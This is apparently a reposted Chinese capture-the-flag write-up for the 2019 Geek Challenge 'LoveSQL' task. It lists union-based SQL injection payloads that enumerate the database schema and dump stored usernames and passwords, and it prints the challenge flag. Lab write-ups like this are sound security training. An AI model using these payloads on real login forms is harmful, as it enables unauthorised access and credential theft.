[极客大挑战 2019]LoveSQL

Posted 凇岳

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[极客大挑战 2019]LoveSQL相关的知识,希望对你有一定的参考价值。

打开链接,出现登录框

首先用sql万能密码登录

 

 

 

 

 

使用MD5无法解密

测试注入点

 

 

判断注入点类型

password=e8671c7fcf1a0e6e8b0a14b267de947e

构造username,判断为字符型注入
admin\' and \'1\'=\'1成功登录

admin\' and \'1\'=\'2登陆失败

判断列数

admin\' order by 3 #登录成功

admin\' order by 4 #登录失败

可知共三个字段

判断显示位

构造username=a\' union select 1,2,3 #

 

获取数据库名

构造a\' union select 1,database(),3 #

获取表名

构造a\' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=\'geek\' #

geekuser,l0ve1ysq1

获取列名

a\' union select 1,2,column_name from information_schema.columns where table_name=\'l0ve1ysq1\' #

获取数据

a\' union select 1,2,group_concat(concat_ws(\'id\',username,password)) from l0ve1ysq1 #

 

 得到flag{e2ad5e4d-53c2-4b8a-a9d8-5567ef2127f7}

 

以上是关于[极客大挑战 2019]LoveSQL的主要内容,如果未能解决你的问题,请参考以下文章

[极客大挑战 2019]LoveSQL

[极客大挑战 2019]LoveSQL 1(SQL注入)

[极客大挑战 2019]LoveSQL

CTF练习——[极客大挑战 2019]LoveSQL1

BUUCTF[极客大挑战2019]LoveSQL

BUU sql注入-[极客大挑战 2019]LoveSQL